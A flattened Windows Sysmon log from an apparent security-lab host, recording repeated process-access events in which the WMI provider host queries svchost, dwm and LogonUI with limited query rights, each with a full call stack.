21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1600-00000000D101}1164C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150869Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1500-00000000D101}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150868Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1500-00000000D101}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150867Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1400-00000000D101}736C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150866Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1400-00000000D101}736C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150865Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1300-00000000D101}1008C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150864Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1300-00000000D101}1008C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150863Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1200-00000000D101}960C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150862Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1200-00000000D101}960C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150861Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1100-00000000D101}968C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150860Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1100-00000000D101}968C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150859Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1000-00000000D101}940C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150858Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1000-00000000D101}940C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150857Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0F00-00000000D101}928C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150856Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0F00-00000000D101}928C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150855Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.479{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0E00-00000000D101}880C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150854Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 